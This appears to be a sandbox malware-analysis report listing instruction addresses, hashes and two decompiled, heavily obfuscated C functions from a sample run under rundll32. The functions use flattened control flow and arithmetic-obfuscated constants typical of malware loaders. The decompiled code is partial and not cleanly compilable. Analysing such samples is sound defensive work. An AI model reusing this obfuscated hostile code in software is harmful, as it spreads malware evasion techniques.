                                                                                                                                  0x002db6c2
                                                                                                                                  0x002db6ce
                                                                                                                                  0x002db6ce
                                                                                                                                  0x002db584
                                                                                                                                  0x002db589
                                                                                                                                  0x002db590
                                                                                                                                  0x002db597
                                                                                                                                  0x00000000
                                                                                                                                  0x002db597
                                                                                                                                  0x002db48f
                                                                                                                                  0x002db546
                                                                                                                                  0x002db54b
                                                                                                                                  0x002db55b
                                                                                                                                  0x002db4e6
                                                                                                                                  0x002db4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x002db4e6
                                                                                                                                  0x002db54d
                                                                                                                                  0x00000000
                                                                                                                                  0x002db54d
                                                                                                                                  0x002db49b
                                                                                                                                  0x002db52a
                                                                                                                                  0x002db52f
                                                                                                                                  0x002db53f
                                                                                                                                  0x00000000
                                                                                                                                  0x002db53f
                                                                                                                                  0x002db531
                                                                                                                                  0x00000000
                                                                                                                                  0x002db531
                                                                                                                                  0x002db4a3
                                                                                                                                  0x002db510
                                                                                                                                  0x002db515
                                                                                                                                  0x002db518
                                                                                                                                  0x002db51a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002db51a
                                                                                                                                  0x002db4ab
                                                                                                                                  0x002db4df
                                                                                                                                  0x002db4e4
                                                                                                                                  0x002db4ee
                                                                                                                                  0x002db4ee
                                                                                                                                  0x00000000
                                                                                                                                  0x002db4e4
                                                                                                                                  0x002db4af
                                                                                                                                  0x002db4c8
                                                                                                                                  0x002db4ce
                                                                                                                                  0x002db4d5
                                                                                                                                  0x002db4d7
                                                                                                                                  0x002db4c4
                                                                                                                                  0x002db4c4
                                                                                                                                  0x00000000
                                                                                                                                  0x002db4c4
                                                                                                                                  0x002db4b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002db4bf
                                                                                                                                  0x00000000
                                                                                                                                  0x002db59f
                                                                                                                                  0x002db59f
                                                                                                                                  0x002db5a5
                                                                                                                                  0x002db698
                                                                                                                                  0x002db69d
                                                                                                                                  0x002db6af
                                                                                                                                  0x002db6b4
                                                                                                                                  0x00000000
                                                                                                                                  0x002db6b4
                                                                                                                                  0x002db69f
                                                                                                                                  0x00000000
                                                                                                                                  0x002db69f
                                                                                                                                  0x002db5ab
                                                                                                                                  0x002db5b1
                                                                                                                                  0x002db679
                                                                                                                                  0x002db67e
                                                                                                                                  0x002db68e
                                                                                                                                  0x00000000
                                                                                                                                  0x002db68e
                                                                                                                                  0x002db680
                                                                                                                                  0x00000000
                                                                                                                                  0x002db680
                                                                                                                                  0x002db5b7
                                                                                                                                  0x002db5bd
                                                                                                                                  0x002db658
                                                                                                                                  0x002db65d
                                                                                                                                  0x002db66f
                                                                                                                                  0x00000000
                                                                                                                                  0x002db66f
                                                                                                                                  0x002db65f
                                                                                                                                  0x00000000
                                                                                                                                  0x002db65f
                                                                                                                                  0x002db5c3
                                                                                                                                  0x002db5c9
                                                                                                                                  0x002db639
                                                                                                                                  0x002db63e
                                                                                                                                  0x002db64e
                                                                                                                                  0x00000000
                                                                                                                                  0x002db64e
                                                                                                                                  0x002db640
                                                                                                                                  0x00000000
                                                                                                                                  0x002db640
                                                                                                                                  0x002db5cb
                                                                                                                                  0x002db5d1
                                                                                                                                  0x002db61f
                                                                                                                                  0x002db62a
                                                                                                                                  0x002db632
                                                                                                                                  0x00000000
                                                                                                                                  0x002db632
                                                                                                                                  0x002db5d3
                                                                                                                                  0x002db5d9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002db5f9
                                                                                                                                  0x002db5fe
                                                                                                                                  0x002db601
                                                                                                                                  0x002db601

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: V$h5$kn=
                                                                                                                                  • API String ID: 0-2568719763
                                                                                                                                  • Opcode ID: 882e6d1118a4764eb56cb089f1e584ceac3c54ba36e90b19855eece032f3595c
                                                                                                                                  • Instruction ID: 51265680cbd3d5261c1ecf11df4ea101734d11d292be312cd4d2b0b86affe235
                                                                                                                                  • Opcode Fuzzy Hash: 882e6d1118a4764eb56cb089f1e584ceac3c54ba36e90b19855eece032f3595c
                                                                                                                                  • Instruction Fuzzy Hash: 70A19970128341CBC72ACF26D4A552FBBE0EB84308F55892EF19686261D775DE29CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E4116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002E4116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E002D8F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E002D9350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E002E1E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E002EABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E002EDA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E002EC1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                                  0x002e411c
                                                                                                                                  0x002e4126
                                                                                                                                  0x002e412e
                                                                                                                                  0x002e4136
                                                                                                                                  0x002e413e
                                                                                                                                  0x002e4146
                                                                                                                                  0x002e414e
                                                                                                                                  0x002e4156
                                                                                                                                  0x002e415e
                                                                                                                                  0x002e4166
                                                                                                                                  0x002e416e
                                                                                                                                  0x002e4176
                                                                                                                                  0x002e417e
                                                                                                                                  0x002e4183
                                                                                                                                  0x002e418b
                                                                                                                                  0x002e4193
                                                                                                                                  0x002e41a4
                                                                                                                                  0x002e41a8
                                                                                                                                  0x002e41aa
                                                                                                                                  0x002e41af
                                                                                                                                  0x002e41bb
                                                                                                                                  0x002e41be
                                                                                                                                  0x002e41c2
                                                                                                                                  0x002e41ca
                                                                                                                                  0x002e41da
                                                                                                                                  0x002e41de
                                                                                                                                  0x002e41e7
                                                                                                                                  0x002e41ec
                                                                                                                                  0x002e41f2
                                                                                                                                  0x002e41fa
                                                                                                                                  0x002e4202
                                                                                                                                  0x002e4207
                                                                                                                                  0x002e420f
                                                                                                                                  0x002e4214
                                                                                                                                  0x002e421c
                                                                                                                                  0x002e4224
                                                                                                                                  0x002e4230
                                                                                                                                  0x002e4233
                                                                                                                                  0x002e4237
                                                                                                                                  0x002e423f
                                                                                                                                  0x002e4247
                                                                                                                                  0x002e424f
                                                                                                                                  0x002e4254
                                                                                                                                  0x002e425c
                                                                                                                                  0x002e4264
                                                                                                                                  0x002e426c
                                                                                                                                  0x002e4274
                                                                                                                                  0x002e4279
                                                                                                                                  0x002e4281
                                                                                                                                  0x002e4289
                                                                                                                                  0x002e428e
                                                                                                                                  0x002e4296
                                                                                                                                  0x002e429b
                                                                                                                                  0x002e42a3
                                                                                                                                  0x002e42ab
                                                                                                                                  0x002e42b3
                                                                                                                                  0x002e42bb
                                                                                                                                  0x002e42c0
                                                                                                                                  0x002e42c8
                                                                                                                                  0x002e42d0
                                                                                                                                  0x002e42d8
                                                                                                                                  0x002e42dc
                                                                                                                                  0x002e42e4
                                                                                                                                  0x002e42f4
                                                                                                                                  0x002e42f9
                                                                                                                                  0x002e42ff
                                                                                                                                  0x002e430c
                                                                                                                                  0x002e4314
                                                                                                                                  0x002e431c
                                                                                                                                  0x002e4324
                                                                                                                                  0x002e432c
                                                                                                                                  0x002e4334
                                                                                                                                  0x002e4339
                                                                                                                                  0x002e4341
                                                                                                                                  0x002e4349
                                                                                                                                  0x002e4355
                                                                                                                                  0x002e435a
                                                                                                                                  0x002e4360
                                                                                                                                  0x002e4368
                                                                                                                                  0x002e4370
                                                                                                                                  0x002e4378
                                                                                                                                  0x002e4380
                                                                                                                                  0x002e4388
                                                                                                                                  0x002e4390
                                                                                                                                  0x002e4398
                                                                                                                                  0x002e43a0
                                                                                                                                  0x002e43a8
                                                                                                                                  0x002e43b0
                                                                                                                                  0x002e43b8
                                                                                                                                  0x002e43c0
                                                                                                                                  0x002e43cc
                                                                                                                                  0x002e43cf
                                                                                                                                  0x002e43d3
                                                                                                                                  0x002e43d7
                                                                                                                                  0x002e43df
                                                                                                                                  0x002e43df
                                                                                                                                  0x002e43f1
                                                                                                                                  0x002e44da
                                                                                                                                  0x00000000
                                                                                                                                  0x002e43f7
                                                                                                                                  0x002e43f9
                                                                                                                                  0x002e44b8
                                                                                                                                  0x002e44c1
                                                                                                                                  0x002e44c6
                                                                                                                                  0x002e44c8
                                                                                                                                  0x002e44cb
                                                                                                                                  0x002e44ce
                                                                                                                                  0x002e44d0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e44d0
                                                                                                                                  0x002e43ff
                                                                                                                                  0x002e4405
                                                                                                                                  0x002e445e
                                                                                                                                  0x002e446a
                                                                                                                                  0x002e447b
                                                                                                                                  0x002e447f
                                                                                                                                  0x002e4485
                                                                                                                                  0x002e4489
                                                                                                                                  0x002e448e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4407
                                                                                                                                  0x002e440d
                                                                                                                                  0x002e450a
                                                                                                                                  0x002e4513
                                                                                                                                  0x002e451e
                                                                                                                                  0x002e4525
                                                                                                                                  0x002e4527
                                                                                                                                  0x002e4529
                                                                                                                                  0x002e452f
                                                                                                                                  0x002e4531
                                                                                                                                  0x002e4531
                                                                                                                                  0x002e452b
                                                                                                                                  0x002e452b
                                                                                                                                  0x002e452d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e452d
                                                                                                                                  0x002e4529
                                                                                                                                  0x002e4413
                                                                                                                                  0x002e4413
                                                                                                                                  0x002e4419
                                                                                                                                  0x00000000
                                                                                                                                  0x002e441f
                                                                                                                                  0x002e4430
                                                                                                                                  0x002e4434
                                                                                                                                  0x002e4438
                                                                                                                                  0x002e443d
                                                                                                                                  0x002e4442
                                                                                                                                  0x002e4448
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4448
                                                                                                                                  0x002e4442
                                                                                                                                  0x002e4419
                                                                                                                                  0x002e440d
                                                                                                                                  0x002e4405
                                                                                                                                  0x002e43f9
                                                                                                                                  0x002e4535
                                                                                                                                  0x002e453e
                                                                                                                                  0x002e453e
                                                                                                                                  0x002e44f1
                                                                                                                                  0x002e44f6
                                                                                                                                  0x002e44f7
                                                                                                                                  0x002e44fc
                                                                                                                                  0x002e44fc
                                                                                                                                  0x002e44fc
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,a$`2$?
                                                                                                                                  • API String ID: 0-2087061617
                                                                                                                                  • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                  • Instruction ID: d70f504ff7292196f469b1cc5a156d7c03a424df455d6df42324530058d4b746
                                                                                                                                  • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                  • Instruction Fuzzy Hash: 26A121725583819FC368DF66C88A40BFBF1BBC5708F408A1DF59A96260D3B58A198F46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F13AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002F13AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E002D4B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E002D4B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E002D4B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E002D3BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E002D3BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E002D4DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                                  0x002f13ae
                                                                                                                                  0x002f13b9
                                                                                                                                  0x002f13be
                                                                                                                                  0x002f13c1
                                                                                                                                  0x002f13c4
                                                                                                                                  0x002f13c5
                                                                                                                                  0x002f13c6
                                                                                                                                  0x002f13cb
                                                                                                                                  0x002f13cf
                                                                                                                                  0x002f13d3
                                                                                                                                  0x002f13da
                                                                                                                                  0x002f13e1
                                                                                                                                  0x002f13e8
                                                                                                                                  0x002f13ef
                                                                                                                                  0x002f13f2
                                                                                                                                  0x002f13f9
                                                                                                                                  0x002f1404
                                                                                                                                  0x002f140b
                                                                                                                                  0x002f1412
                                                                                                                                  0x002f1415
                                                                                                                                  0x002f141c
                                                                                                                                  0x002f1423
                                                                                                                                  0x002f142a
                                                                                                                                  0x002f1431
                                                                                                                                  0x002f1438
                                                                                                                                  0x002f143c
                                                                                                                                  0x002f1440
                                                                                                                                  0x002f1447
                                                                                                                                  0x002f144e
                                                                                                                                  0x002f1455
                                                                                                                                  0x002f145c
                                                                                                                                  0x002f1460
                                                                                                                                  0x002f1467
                                                                                                                                  0x002f146e
                                                                                                                                  0x002f1475
                                                                                                                                  0x002f147c
                                                                                                                                  0x002f1483
                                                                                                                                  0x002f148a
                                                                                                                                  0x002f1491
                                                                                                                                  0x002f1498
                                                                                                                                  0x002f149f
                                                                                                                                  0x002f14a6
                                                                                                                                  0x002f14ad
                                                                                                                                  0x002f14b4
                                                                                                                                  0x002f14bb
                                                                                                                                  0x002f14bf
                                                                                                                                  0x002f14c6
                                                                                                                                  0x002f14cd
                                                                                                                                  0x002f14d4
                                                                                                                                  0x002f14db
                                                                                                                                  0x002f14e2
                                                                                                                                  0x002f14e9
                                                                                                                                  0x002f14f0
                                                                                                                                  0x002f14f4
                                                                                                                                  0x002f14f8
                                                                                                                                  0x002f14ff
                                                                                                                                  0x002f1506
                                                                                                                                  0x002f1513
                                                                                                                                  0x002f151a
                                                                                                                                  0x002f1525
                                                                                                                                  0x002f1528
                                                                                                                                  0x002f152f
                                                                                                                                  0x002f1536
                                                                                                                                  0x002f153d
                                                                                                                                  0x002f1544
                                                                                                                                  0x002f1548
                                                                                                                                  0x002f154f
                                                                                                                                  0x002f1556
                                                                                                                                  0x002f155a
                                                                                                                                  0x002f1561
                                                                                                                                  0x002f1568
                                                                                                                                  0x002f156f
                                                                                                                                  0x002f1576
                                                                                                                                  0x002f157a
                                                                                                                                  0x002f1581
                                                                                                                                  0x002f158a
                                                                                                                                  0x002f1591
                                                                                                                                  0x002f159e
                                                                                                                                  0x002f159f
                                                                                                                                  0x002f15a2
                                                                                                                                  0x002f15a6
                                                                                                                                  0x002f15ad
                                                                                                                                  0x002f15b4
                                                                                                                                  0x002f15c0
                                                                                                                                  0x002f15c3
                                                                                                                                  0x002f15c6
                                                                                                                                  0x002f15cd
                                                                                                                                  0x002f15d4
                                                                                                                                  0x002f15df
                                                                                                                                  0x002f15e2
                                                                                                                                  0x002f15e9
                                                                                                                                  0x002f15f0
                                                                                                                                  0x002f15f7
                                                                                                                                  0x002f15fe
                                                                                                                                  0x002f1609
                                                                                                                                  0x002f160c
                                                                                                                                  0x002f1613
                                                                                                                                  0x002f1616
                                                                                                                                  0x002f161b
                                                                                                                                  0x002f161c
                                                                                                                                  0x002f1629
                                                                                                                                  0x002f1632
                                                                                                                                  0x002f163f
                                                                                                                                  0x002f1648
                                                                                                                                  0x002f164d
                                                                                                                                  0x002f1661
                                                                                                                                  0x002f1666
                                                                                                                                  0x002f167c
                                                                                                                                  0x002f1684
                                                                                                                                  0x002f1687
                                                                                                                                  0x002f168d
                                                                                                                                  0x002f1693
